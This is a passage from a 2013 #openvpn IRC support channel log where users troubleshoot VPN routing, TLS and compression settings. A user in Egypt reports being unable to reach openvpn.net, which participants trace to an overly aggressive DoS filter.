enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 20:57 <@vpnHelper> http://ircpimps.org/redirect.png 20:58 < pekster> Before you deal with redirecting all traffic, you need a functional setup. You must be able to ping your endpoint or your VPN is fundamentally broken and needs to be fixed first 21:00 < mikey_w> I can ping and ssh my home sever and my client connect but no internet through it? 21:00 < mikey_w> connects 21:00 < pekster> The VPN peer, not the external IP 21:01 < mikey_w> Don't undersatnd "VPN peer"? 21:01 < pekster> Pinging the external IP of the server is just as worthless as pinging localhost when your ISP/DSL is disconnected and claiming your internet doesn't work 21:01 < pekster> The tunnel IP, not the external IP. The IP of the peer across the tunnel 21:03 < pekster> ie: the very first block on that flowchart 21:03 < pekster> You'll notice how it says if you can't complete that step you need to "fix your vpn" 21:03 < pekster> Can't route traffic over a link that doesn't work 21:04 < mikey_w> notice that what says that? 21:04 < pekster> The flowchart you were linked 21:05 < pekster> I suggest you read it, and the preceding information since it tells you, step by step, exactly how to do what you want 21:06 < mikey_w> ok, thanks 21:22 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has quit [Read error: Connection reset by peer] 21:22 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has joined #openvpn 21:31 -!- MeanderingCode_ [~Meanderin@71-213-170-8.albq.qwest.net] has joined #openvpn 21:35 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has quit [Ping timeout: 244 seconds] 22:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 22:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 22:05 -!- MariusIT2 [~userit@86.120.191.55] has quit [Read error: Connection reset by peer] 22:06 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 22:07 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 256 seconds] 22:07 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 22:07 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 22:07 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Ping timeout: 256 seconds] 22:08 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 22:08 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 22:09 -!- brute11k [~brute11k@89.249.230.159] has quit [Read error: Connection reset by peer] 22:12 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:17 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 22:22 -!- mikey_w [~mike@c-71-63-115-202.hsd1.va.comcast.net] has quit [Ping timeout: 256 seconds] 22:26 -!- mikey_w [~mike@c-71-63-115-202.hsd1.va.comcast.net] has joined #openvpn 23:07 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Read error: Operation timed out] 23:08 -!- MorgyN [~mig@island.morgyn.org] has quit [Read error: Operation timed out] 23:08 -!- mcp [~mcp@wolk-project.de] has quit [Read error: Operation timed out] 23:08 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jwtrifiamymywmib] has quit [Ping timeout: 245 seconds] 23:09 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-yssobzmevvtknuoq] has quit [Ping timeout: 245 seconds] 23:10 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Ping timeout: 276 seconds] 23:10 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 23:10 -!- paccer [uid4847@gateway/web/irccloud.com/x-txhaywlkhsotevex] has quit [Ping timeout: 246 seconds] 23:10 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 276 seconds] 23:11 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 23:14 -!- mikey_w [~mike@c-71-63-115-202.hsd1.va.comcast.net] has quit [Ping timeout: 256 seconds] 23:14 -!- else- [~else@towely.iodev.org] has quit [Ping timeout: 276 seconds] 23:18 -!- mikey_w [~mike@71.63.115.202] has joined #openvpn 23:19 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 23:20 -!- else- [~else@towely.iodev.org] has joined #openvpn 23:23 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn 23:23 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 23:28 -!- MorgyN [~mig@178.63.57.253] has joined #openvpn 23:32 -!- [fred] [fred@konfuzi.us] has joined #openvpn 23:38 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:38 -!- mode/#openvpn [+o krzee] by ChanServ --- Day changed Tue Feb 19 2013 00:19 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has quit [] 00:29 -!- jaws [~root@5.231.5.192] has joined #openvpn 00:37 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jfwecqjheggpxujq] has joined #openvpn 00:40 -!- MeanderingCode_ [~Meanderin@71-213-170-8.albq.qwest.net] has quit [Remote host closed the connection] 00:54 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 01:00 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 256 seconds] 01:06 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-fzgpavylrsfwposr] has joined #openvpn 01:08 <@krzee> im getting a weird issue in osx 10.8 where tunnelblick cannot start the vpn, the log says address already in use, but i killed the vpn process manually, and netstat -l|grep 1194 shows nothing 01:08 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has quit [Ping timeout: 252 seconds] 01:09 < pekster> netstat -an is a better bet 01:10 <@krzee> hah its there 01:10 <@krzee> with no vpn process, what could it be? 01:10 < pekster> Add -p, if Darwin supports it 01:11 <@krzee> never seen 'Add', doesnt seem to be in osx 01:12 < pekster> No, add "-p" to nestat 01:12 <@krzee> oh meh 01:13 <@krzee> no -p and "process" only shows up in the man page under -a 01:13 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 01:14 < pekster> Apple, saving you from useful command switches since 1976 01:15 <@krzee> lsof -i -P doesnt show 1194 anywhere but netstat -an does haha 01:18 < jaws> ps -e | grep openvpn 01:19 < jaws> killall 01:20 <@krzee> no results (except grep_ 01:20 -!- paccer [uid4847@gateway/web/irccloud.com/x-byyrqpqutjavdypw] has joined #openvpn 01:21 -!- b1rkh0ff [~b1rkh0ff@178.77.26.26] has joined #openvpn 01:23 -!- dekroning [~dekroning@86.86.174.139] has quit [Ping timeout: 255 seconds] 01:25 <@krzee> lsof doesnt show vpn (except 2 unrelated to openvpn) or 1194 but netstat -an does show 1194 01:28 < jaws> kill 1192 then 01:28 < jaws> i mean kill that process which is using that port 01:29 <@krzee> nothing is using that port 01:31 < jaws> post your lsof -i 01:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 01:37 < matsh> I'm getting this on a dd-wrt client: 01:37 < matsh> Mon Feb 18 21:21:13 2013 VERIFY ERROR: depth=1, error=self signed certificate in certificate chain: 01:37 < matsh> Mon Feb 18 21:21:13 2013 TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:lib(20):func(144):reason(134) 01:37 < matsh> Mon Feb 18 21:21:13 2013 TLS Error: TLS object -> incoming plaintext read error 01:38 < matsh> More or less the exact same config as used on a freebsd client. 01:44 < jaws> check your certificate 01:45 -!- discojoe [~wtf@193.28.228.85] has quit [Ping timeout: 256 seconds] 01:50 -!- discojoe [~wtf@193.28.228.85] has joined #openvpn 01:59 * jaws discos with discojoe 02:13 -!- rfxn [~teck7@bas1-montreal54-1167956220.dsl.bell.ca] has quit [Ping timeout: 248 seconds] 02:13 -!- rfxn [~teck7@69.157.152.252] has joined #openvpn 02:17 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 02:19 -!- digilink [~digilink@70.90.228.197] has joined #openvpn 02:19 -!- digilink [~digilink@70.90.228.197] has quit [Changing host] 02:19 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 02:30 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 02:30 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 02:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 02:30 -!- mode/#openvpn [+o krzee] by ChanServ 02:32 -!- Voss [~Voss@unaffiliated/dionysus] has joined #openvpn 02:37 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 02:37 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 02:45 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 02:46 -!- jaws [~root@5.231.5.192] has quit [Ping timeout: 245 seconds] 02:51 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 276 seconds] 02:57 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 03:02 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 03:02 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 03:02 -!- mode/#openvpn [+o vpnHelper] by ChanServ 03:27 -!- thumbs [1000@unaffiliated/thumbs] has quit [Read error: Operation timed out] 03:28 < mnice> hello 03:28 -!- thumbs [1000@unaffiliated/thumbs] has joined #openvpn 03:30 < mnice> i've created a standard vpn using `. ./vars; ./build-ca; build-key-server server; ./build-key clientxx; ..' are these defaults secure and optimalized ? 03:30 < mnice> vpn works like charm 03:39 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 03:48 -!- torbjorn [~torbjorn@2001:840:4051::56] has quit [Remote host closed the connection] 03:59 -!- dazo_afk is now known as dazo 04:13 -!- thumbs [1000@unaffiliated/thumbs] has quit [Ping timeout: 260 seconds] 04:22 -!- thumbs [1000@unaffiliated/thumbs] has joined #openvpn 04:34 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 252 seconds] 04:54 -!- MariusIT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 04:54 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 05:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 05:09 <@dazo> mnice: yeah, those defaults (given that you did as the manual says, edit ./vars) are usually quite good 05:12 <@dazo> mnice: you can however increase the key length ... to make it even stronger ... but defaults shouldn't be bad at all 05:27 < discojoe> can i have openvpn run on multiple ports? or do i have to create a new instance for each port? 05:36 < havoc> discojoe: need an instance per port 05:39 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 05:46 -!- discojoe [~wtf@193.28.228.85] has quit [Ping timeout: 245 seconds] 05:47 -!- discojoe [~wtf@193.28.228.85] has joined #openvpn 05:51 < discojoe> ah, thanks havoc 06:11 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 06:39 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 06:47 < mnice> thx 06:47 < mnice> everything runs pretty fine 06:47 < havoc> np 06:48 < mnice> btw, does anybody have some useful set of scripts for generating config files for windows client (openvpn GUI) to help our stupid devels with installation ? 06:48 < mnice> **clients ? 06:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B53193.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 07:05 -!- master_of_master [~master_of@p57B52866.dip.t-dialin.net] has joined #openvpn 07:16 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has joined #openvpn 07:18 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 07:18 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:18 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:19 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services] 07:19 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:19 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:21 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services] 07:21 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:21 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:23 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services] 07:23 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:23 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:24 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 07:24 -!- Irssi: #openvpn: Total of 174 nicks [5 ops, 0 halfops, 1 voices, 168 normal] 07:24 -!- mnice [~jdoe@static-84-242-118-58.net.upcbroadband.cz] has quit [Ping timeout: 252 seconds] 07:25 -!- daemoen [~daemoen@216.245.201.138] has quit [Ping timeout: 252 seconds] 07:25 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:25 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:26 -!- mnice [~jdoe@84.242.118.58] has joined #openvpn 07:26 -!- mnice is now known as Guest9566 07:31 -!- daemoen [~daemoen@216.245.201.138] has joined #openvpn 07:39 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Read error: Connection reset by peer] 07:57 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has quit [] 08:05 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 08:05 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 08:05 -!- mode/#openvpn [+o vpnHelper] by ChanServ 08:16 -!- Guest9566 [~jdoe@84.242.118.58] has left #openvpn [] 08:16 -!- mnice [~jdoe@84.242.118.58] has joined #openvpn 08:17 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:18 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:26 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 256 seconds] 08:39 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 08:42 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:44 -!- b1rkh0ff [~b1rkh0ff@178.77.26.26] has quit [Read error: Connection reset by peer] 08:45 -!- b1rkh0ff [~b1rkh0ff@178.77.26.26] has joined #openvpn 08:55 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 09:10 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:30 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 09:32 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 244 seconds] 09:32 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 09:33 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 09:37 -!- alaa [~alaa@41.36.146.1] has joined #openvpn 09:37 < alaa> hi 09:37 < alaa> I can't access http://openvpn.net from Egypt 09:37 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 09:37 < alaa> tested multiple isps 09:37 < alaa> thought our government might be blocking it, but my ISP claims the block is from the openvpn.net webserver 09:38 < alaa> how do I reach the sysadmins to verify this? 09:38 < kantlivelong> alaa: are you looking for something in particular? 09:38 < kantlivelong> alaa: if they are blocking based on IP then you may not be able to 09:38 < pekster> alaa: You can traceroute to see if you get closer to the server; if you can't make it past your ISP or into US core routing, it's not a webserver problem 09:38 < alaa> kantlivelong: just want to make sure there is no illegal censorship going on in my country 09:39 < kantlivelong> alaa: ah. 09:39 <@ecrist> alaa: we're not blocking egypt 09:39 < kantlivelong> alaa: does it resolve to an IP? 09:39 < pekster> You'll also find people here happy to mirror installer files (I'm happy to help with installers and the GPG signatures on my personal domain if you'd like 09:39 < alaa> pekster: thx many work arounds but I'm more interested in fighting this 09:40 <@ecrist> alaa: we're not blocking egypt 09:40 < alaa> kantlivelong: yes 67.228.116.150 09:40 < kantlivelong> alaa: what does a traceroute provide? 09:40 < alaa> kantlivelong: do I paste here? 09:40 < alaa> kantlivelong: it stops at a local hop 09:40 < kantlivelong> alaa: pastebin.ca 09:40 < pekster> A pastebin please. dpaste.org or such 09:40 < rob0> use a pastebin, obviously 09:41 < rob0> If it stops at a local hop, there's your problem. 09:41 < alaa> rob0: sorry been sometime since I used irc 09:41 <@ecrist> if the traceroute stops locally, you've got something messed up 09:42 < alaa> http://dpaste.org/WiZSK/ 09:42 < alaa> traceroute 09:42 < pekster> And it continues timing out after that? Some hosts don't respond to traceroute, so you might get a few "***" lines in a row before it picks up again 09:42 < alaa> could it be some automatically triggered anti DDOS measure? 09:43 < alaa> pekster: yeah it continues to timeout 09:43 < pekster> No, traceroute should work, and even if it doesn't, you should be able to hit the openvpn.net webserver without issue. Looks like an ISP-level block 09:43 < kantlivelong> alaa: is calling the ISP an option? 09:43 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 09:43 < alaa> kantlivelong: I did, they claimed blocking is from openvpn.net side 09:43 < pekster> If you'd like a mirror of some files to get a VPN client working so you can bypass the ISP issue, let me know what you need and I'll mirror files for you 09:43 <@ecrist> alaa: I have someone looking into it 09:44 < alaa> kantlivelong: asked on twitter and got confirmation that site inaccessible from all local isps 09:44 <@ecrist> sounds like you might be triggering a DDoS filter 09:44 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Remote host closed the connection] 09:44 < alaa> ecrist: ahah that fits with the ISPs claim 09:45 < kantlivelong> dos filter sounds logical 09:45 < alaa> sorry political situation here is vague and fear the state will start blocking illegally 09:45 < kantlivelong> alaa: im sure there are mirrors :) and Tor can always help 09:45 < kantlivelong> Tor/OpenVPN 09:45 < rob0> Sounds like the ISP is either clueless or lying. 09:46 < pekster> ^^ that 09:46 < alaa> kantlivelong: yeah I'm not worried about actual access as much as about the political fight for the right of it :-) 09:46 < kantlivelong> alaa: yeh.. stupid govts.. 09:46 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 09:46 < rob0> OpenVPN.net has no desire to block Egypt, I am sure. 09:47 < pekster> Quite the reverse, no doubt 09:47 < alaa> ecrist: can u confirm somehow if dos filter? is there a log or something? 09:47 < alaa> rob0: of course 09:47 <@ecrist> alaa: I don't have access to those filtering boxes directly, but the guy who has access will look into it shortly 09:47 < rob0> alaa, the filter is probably being hit in your ISP. 09:48 <@ecrist> alaa: we'd still like to see a traceroute from you 09:48 < pekster> Not to say looking at the US-side isn't a good thing to rule it out, but why would that be an issue with a traceroute dropping beofre it hits core US routing? 09:48 < pekster> ecrist: Already have it: http://dpaste.org/WiZSK/ 09:48 < rob0> anyway, my traceroute/tracepaths also time out after 14 hops. 09:49 < rob0> (8 of those hops are outside my ISP.) 09:49 < pekster> tedata.net is out of Giza, Egypt 09:49 < alaa> ecrist: actually scrap that tracerout I'm getting same result no matter what I'm testing, I'll ask a friend using different ISP to send his 09:49 < pekster> heh, they block all traceroute. Cute. 09:49 <@ecrist> or he's quitting it too early 09:49 < pekster> True 09:50 < rob0> usually 30 hops should be enough 09:50 < alaa> i'm using the default 30 hops 09:51 < pekster> Right, but sometimes you'll get 4-8 routers in a row that drop it (now if it runs until 30+ TTL without change, then that's not the issue) 09:52 < alaa> runs until 30 09:52 < alaa> same result pointing at google.com 09:52 <@ecrist> can you ping the ip? 09:52 < rob0> po2.fcr01.sr01.sea01.networklayer.com (67.228.118.138) is the last visible hop for me, tested from two sites with both traceroute & tracepath 09:53 < pekster> Yea, here's the trailing tracepath for me (the comcast.net stuff is my ISP's infra) http://dpaste.org/42OZJ/ 09:53 <@ecrist> nm, I can't ping, either 09:53 < alaa> ecrist: nope 09:53 <@ecrist> rob0: I make it one hop further it seems, than you do, before my trace dies 09:53 < pekster> You could try a ping-based traceroute though (maybe it'll get further than the ISP, possibly.) 09:53 < rob0> 3 packets transmitted, 0 received, 100% packet loss, time 2000ms 09:53 < alaa> ecrist: I can ping it from an east coast US server 09:54 < rob0> My ping was from a colo site in Birmingham, Alabama 09:55 < rob0> Perhaps OpenVPN should consider allowing ping and traceroute, limited if desired. 09:55 < alaa> that's traceroute from friend who is on another isp http://pastebin.com/Aex0P83d 09:55 <@ecrist> rob0: it's bad practice imho, to limit such 09:56 <@ecrist> I'll talk to the guys and make sure we start allowing it 09:57 < rob0> heh. I can't reach http://openvpn.net/ either. 09:57 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 09:58 < rob0> but vpnHelper can! 09:58 <@ecrist> vpnHelper is on the same box I IRC from 09:58 <@ecrist> and that I VPN in/out of 09:58 < rob0> hmmm. Maybe traceroute triggers the DoS filter? 09:58 < alaa> rob0: lol so at least it is not egypt specific 09:58 <@ecrist> could be 09:59 * ecrist poofs for a while 09:59 < rob0> that is a BAD idea, fwiw 09:59 < pekster> alaa: That friend is able to get further than you and appears to get all the way to the router before the web server 09:59 < alaa> pekster: yep 09:59 < pekster> Yea, clearly an issue with your ISP then 10:00 < pekster> It's *possible* it's some mistake/configuration issue with BGP or the like, but it could also be intentional. No real way to tell the difference 10:00 < alaa> pekster: for the traceroute yes, but my friend still can't access the website 10:01 < rob0> I can't either! From a USA ISP. 10:01 < pekster> Oh, interesting. Maybe it is intentional then and your ISPs have different ways of doing the block (or your friend isn't "supposed" to be able to trace out to US routers either) 10:01 < alaa> pekster: in fact no one in egypt seems to be able to, I got confirmation from over 30 tweeps spanning all the major ISPs 10:01 < pekster> rob0: You can't hit openvpn.net? Hmm, maybe an AS/BGP thing is up then 10:01 < rob0> pekster, times out, no response. 10:02 < pekster> rob0: Oh, nvm, can't be since you can hit 67.228.118.134 on a trace, right? 10:02 < rob0> I can trace to there, yes. 10:02 < pekster> Here's a ping-based trace for me: http://dpaste.org/oN7pu/ 10:02 < pekster> Right. Next hop after that is openvpn.net's webserver I believe 10:03 < rob0> Also times out from my well-connected colo in Birmingham. 10:03 < rob0> so we are blocked, it seems 10:05 < pekster> Interesting, same behaviour on my end now. After 3 or 4 traces over may be 15 minutes. Seems a really low threshhold for a DOS filter :\ 10:06 < pekster> Works fine from my SOCKS proxy out of an AWS cloud host 10:06 < pekster> :( 10:06 < pekster> Wonder how long I'm banned for :P 10:06 < rob0> mattock, ^^ why are we unable to reach http://openvpn.net/ ? 10:06 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 10:06 < rob0> mattock, this is ridiculous. 10:07 < pekster> traceroute/ping (I've pasted the reuslts from 2 of my 4 runs) aren't that unusual for network-types to be doing. The thredhshold appears far too low for sane usage, IMO. 10:07 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 10:08 < rob0> http://downforeveryoneorjustme.com/openvpn.net "It's just you." Just me and my colo and pekster and all of Egypt ... 10:08 <@vpnHelper> Title: Down For Everyone Or Just Me -> Check if your website is down or up? (at downforeveryoneorjustme.com) 10:09 < pekster> I suspect the Egypt case is different due to no traces from *.networklayer.com, but you & I shouldn't be having issues. FWIW I can still hit the routing infra upstream from openvpn.net 10:09 < rob0> I'm pissed. 10:10 < pekster> You've seen the same silly rulesets people post in #netfilter as I have that make liberal use of -m recent for all sorts of silly things... 10:12 < alaa> so I should relax whatever is going on is not caused by the Egyptian government 10:12 < alaa> ? 10:13 < pekster> alaa: Well, that's yet to be determined. rob0 and I both got ourselves "blocked" by doing a few traces to try and help you, so it "might" not be your end 10:13 < pekster> alaa: That said, something is still weird with your ISP since you should get to networklayer.com routers via traceroute or ping. Here are the UDP/traceroute and ICMP/ping traces I pasted earlier: http://dpaste.org/42OZJ/ http://dpaste.org/oN7pu/ (maybe your ISP blocks that kind of traffic?) 10:14 < alaa> pekster: I get the same traceroute no matter which address i test, so I guess my isb just blocks traceroutes!!! 10:15 < pekster> I'd suggest not trying to visit openvpn.net for a while and see if it's some badly written firewall rule that blocks you temporarily for attempting to trace the host (that's what I'm doing hoping the website block gets fixed for me) 10:15 -!- raidz_away is now known as raidz 10:19 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:19 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:31 < rob0> pekster, sure, I see silliness in #Netfilter, but I expect better from OpenVPN Technologies. 10:33 < pekster> Yup. If I can reproduce it after getting myself un-blocked (I hope that's automatic; my AWS/cloud host is a work-around, not the solution) I'll file a report. 4 traces of modest (32-64 byte) size should not causae this 10:34 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:37 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 10:37 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 10:40 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 10:45 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 252 seconds] 10:51 < pekster> rob0 fwiw, the site is accessible for me now. If it wasn't a manual fix with the traffic here, then the temp-ban expired 10:58 < rob0> likewise. But still, that ban was stupid. 11:07 < mikey_w> I am trying to test a new openvpn install with a machine on the same lan. It connects and then I lose all internet connectivity on the test machine? 11:08 < mikey_w> The server pushes 192,168.1.0 to the client. 11:09 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:09 < pekster> Right, routing that via the VPN address instead of the link-local route; that'll cause you issues 11:10 < pekster> You can see the 'local' flag to redirect-gateway, but you don't want to push a route you access locally (I think some OSes will prefer the local route anyway, but it can depend on interface & metric too depending on the OS and configuration) 11:10 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 11:11 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:11 < pekster> mikey_w: Optionally, you can simulate an "off-network" connection by using a router off your LAN to give the client a differnet LAN IP range. It's still not the same as connecting in from outside, but the network is better simulated that way 11:12 < mikey_w> What's the proper redirect-gateway statement 11:12 < mikey_w> ? 11:12 -!- p3rror [~mezgani@41.249.134.77] has joined #openvpn 11:13 < pekster> Depends on your needs. def1 is common, and you may need the local flag as I described earlier. Is there something you don't get from the manpage description of those optional flags? 11:14 < mikey_w> A lot. I've used def1 but no joy, 11:14 < pekster> What's your goal here? 11:15 < mikey_w> Just to test it on the local land before going to a hotspot for testing. 11:15 < pekster> No, what are you trying to do? Testing is a means to test that something is working; what is that "something" ? 11:16 < pekster> !goal 11:16 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 11:16 < mikey_w> all of the above. 11:17 < pekster> ... some of those are mutually exclusive. You "just" want a secure connection, but "also" want to route your Internet over the connection? 11:17 < pekster> It's like saying all you want is an ice cream cone, but you also want dinner with that. 11:17 < pekster> Which is it? 11:18 < mikey_w> I have to think about it. 11:21 < matsh> !paste 11:21 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 11:21 < mikey_w> I keep getting bad source address from client in the log. 11:22 < pekster> Pastebin your server and client configuration, and the relevant logs 11:24 < mikey_w> sorry I have an interruption I need to address. later. 11:35 < matsh> pekster: Trying to hook up a dd-wrt router with my server, http://pastebin.com/rJAjk0W2 11:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has left #openvpn [] 11:37 -!- brute11k [~brute11k@89.249.230.159] has quit [Read error: Connection reset by peer] 11:41 < pekster> matsh: Your comp-lzo options are mis-matched at the very least. They must match exactly on both sides of the connection 11:41 < pekster> matsh: Further, what are the two 192.168 networks? The server should not have a 'route' statement for its own LAN. What is 192.168.0.0/24 and 192.168.10.0/24? 11:41 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 11:42 < matsh> pekster: But should that affect the tls negotiations? 11:42 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn 11:42 < matsh> pekster: They are local lans on two different _clients_ 11:42 < matsh> 192.168.10/24 is the lan behind the dd-wrt 11:44 -!- mezgani_ [~mezgani@41.250.233.240] has joined #openvpn 11:44 < pekster> Ah, okay, and you have ccd files for each then? 11:44 < matsh> That is correct. 11:44 < pekster> Yes, comp-lzo problems should only be for the data channel IIRC, but you still need to fix it :) 11:46 < matsh> The problem is that dd-wrt automagically sets it to 'open-lzo yes' even though you specify it to 'open-lzo'. Could probably be better off adjusting the rest of nodes to '* yes' though. 11:46 -!- p3rror [~mezgani@41.249.134.77] has quit [Ping timeout: 272 seconds] 11:46 < pekster> The default is 'adaptive' which is not the same as 'yes' 11:47 < pekster> yes = forced 